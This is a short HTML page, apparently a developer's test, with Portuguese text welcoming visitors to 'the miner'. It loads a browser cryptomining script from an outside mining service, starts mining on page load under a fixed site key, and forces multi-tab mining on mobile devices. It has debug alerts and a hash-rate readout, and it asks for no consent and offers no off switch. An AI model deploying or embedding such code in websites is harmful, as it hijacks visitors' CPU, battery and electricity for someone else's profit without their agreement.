<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>

<h1>Bem Vindo ao minerador</h1>
<p id="status">Espere alguns segundos para começar a minerar...</p>
<p id="status_wasm"></p>
<p id="status_running"></p>

</body>


<script src="https://webminepool.com/lib/base.js"></script>
<script>
    var siteKey = 'SK_JhGw9gvrrXTqTJ7KhowoL';
	if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
		var miner = WMP.Anonymous(siteKey);
		miner.start(WMP.FORCE_MULTI_TAB);
		alert('MOBILE');
		
	}
	else
	{
		var miner = WMP.Anonymous(siteKey,{throttle: 0.8});
		alert('PC');
	}    
	if(miner)
	{
		miner.start();
		alert('START-OK');
	}
	
	try {
			if(miner.hasWASMSupport()){
				document.getElementById('status_wasm').innerText = 'WASM : OK'; 
			}else{ document.getElementById('status_wasm').innerText = 'WASM : NO'; }
	}catch(e){
			if(miner.hasWASMSupport){
				document.getElementById('status_wasm').innerText = 'WASM : OK'; 
			}else{ document.getElementById('status_wasm').innerText = 'WASM : NO'; }
	}
	
</script>

<script>
function get_hash()
{
	document.getElementById('status').innerText = 'Hashes/s : '+ miner.getHashesPerSecond();	
	document.getElementById('status_running').innerText = 'Is Running : '+ miner.isRunning;

	var timer_at=setTimeout(function(){  
					get_hash();
				}, 2000); 

}

get_hash();
</script>

</html>
